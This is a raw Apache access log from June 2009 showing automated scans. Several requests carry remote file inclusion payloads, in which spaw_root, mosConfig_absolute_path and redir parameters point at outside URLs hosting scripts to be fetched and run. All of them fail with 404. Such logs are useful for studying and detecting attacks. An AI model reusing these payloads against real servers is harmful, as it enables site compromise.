65.23.158.226 - - [19/Jun/2009:00:35:47 -0400] "GET /logs/error_log.Q109060600//admin/spaw/spaw_control.class.php?spaw_root=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
65.23.158.226 - - [19/Jun/2009:00:35:47 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
190.144.44.36 - - [19/Jun/2009:00:36:08 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://harasyeen.do.am/har.gif?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:00:36:11 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://harasyeen.do.am/har.gif?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:00:36:11 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://harasyeen.do.am/har.gif?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:00:36:37 -0400] "GET /logs/error_log.Q109061000//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://harasyeen.do.am/har.gif?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
65.43.96.3 - - [19/Jun/2009:00:37:20 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
65.43.96.3 - - [19/Jun/2009:00:37:20 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
65.43.96.3 - - [19/Jun/2009:00:37:21 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
65.43.96.3 - - [19/Jun/2009:00:37:21 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
211.43.202.66 - - [19/Jun/2009:00:37:25 -0400] "GET /index.php?redir=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:00:37:25 -0400] "GET /logs/index.php?redir=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:00:37:30 -0400] "GET /logs/index.php?redir=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
